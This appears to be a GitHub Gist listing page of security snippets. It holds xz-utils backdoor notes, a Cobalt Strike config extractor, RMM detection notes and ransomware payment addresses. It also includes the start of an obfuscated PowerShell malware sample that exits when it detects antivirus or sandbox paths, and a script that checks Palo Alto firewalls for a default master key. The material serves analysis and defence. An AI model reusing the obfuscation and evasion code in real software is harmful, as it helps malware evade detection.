Skip to content

Instantly share code, notes, and snippets.

View danzek's full-sized avatar
Listening to meowzek

Dan danzek

Listening to meowzek
View GitHub Profile
#!/usr/bin/env python3
import ctypes
import time
import threading
def test():
def access(path):
f = open(path, 'rb')
__ =
There appears to be a string encoded in the binary payload:
Which functions as a killswitch:
Thus, one workaround for affected systems might be to add this to `/etc/environment`:
thesamesam /
Last active May 19, 2024 20:15
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.


On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that

heck-gd /
Created October 13, 2023 11:51
CobaltStrike Volatility Config Extractor
from __future__ import annotations
import re
from itertools import cycle
def load_mapping(filename: str) -> dict[int, int]:
"""Processes textual Volatility memmap output into a page mapping."""
brokensound77 /
Last active March 23, 2024 18:04
Detection Engineering: RMM analysis

Detecting RMM

The most difficult challenge with RMM detection is contextual awareness around usage to determine if it is valid or malicious.

  • if the software is not used in the envrionment
    • could it be legitimate by a random empoyee?
    • is it an attacker BYOL
    • even so, all occurrences could probably be considered suspicious
  • if it is used in the environment
    • is every use of it legitimate? Probably not
  • this also creates significant living off the land (LOL) opportunity
cablej / ESXi ransomware payment addresses
Last active February 26, 2023 22:32
A list of ESXi ransomware payment addresses from, collected from Censys and Shodan.
LeeHolmes / Get-TwitterThread.ps1
Created November 15, 2022 17:57
Recover your Twitter threads from your Twitter export data
$tweetJson = (Get-Content .\tweets.js -Raw).Substring("window.YTD.tweets.part0 =".Length)
$tweets = $tweetJson | ConvertFrom-Json
$currentThread = ""
foreach($currentTweetJson in $tweets)
$currentTweet = $currentTweetJson.tweet
if($currentTweet.in_reply_to_screen_name -eq "Lee_Holmes")
This file has been truncated, but you can view the full file.
$Hl68 =[tyPe]("{2}{9}{5}{1}{7}{4}{6}{0}{8}{3}{10}"-f 'MPR','O.','sY','oN','ssIon.C','tEM.i','o','cOmpRe','ESSi','s','mODe') ; $tEuwx =[Type]("{3}{2}{0}{1}" -F 's','TEm.cONverT','Y','s'); Set ("{1}{0}"-f'e','PdWj') ([TYpe]("{2}{3}{0}{1}{4}"-F 'm','.Io','Sy','sTE','.fILe') ) ; ${s`crip`Tpath} = &("{2}{0}{1}"-f'pli','t-path','s') -parent ${m`Yi`NvoCa`TIoN}."MYC`omM`AND"."d`EFinitI`oN"
if (${sCR`i`P`TPath} -match ("{0}{1}" -f 'av','ast')) {exit}
if (${SCR`IP`TP`ATh} -match "avg") {exit}
if (${s`CrIpTp`A`Th} -match ("{1}{0}"-f 'le','samp')) {exit}
if (${SCr`IPTp`ATH} -match ("{0}{2}{1}" -f'anal','s','ysi')) {exit}
if (${sc`RIpT`paTh} -match ("{1}{2}{0}" -f're','malw','a')) {exit}
if (${SC`RI`PTP`Ath} -match ("{1}{2}{0}" -f'x','sand','bo')) {exit}
if (${Sc`Rip`TP`ATh} -match ("{0}{1}" -f 'v','irus')) {exit}
rqu1 /
Last active November 13, 2023 22:07
check if a PAN firewall is using the default master key when globalprotect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
class PanCrypt():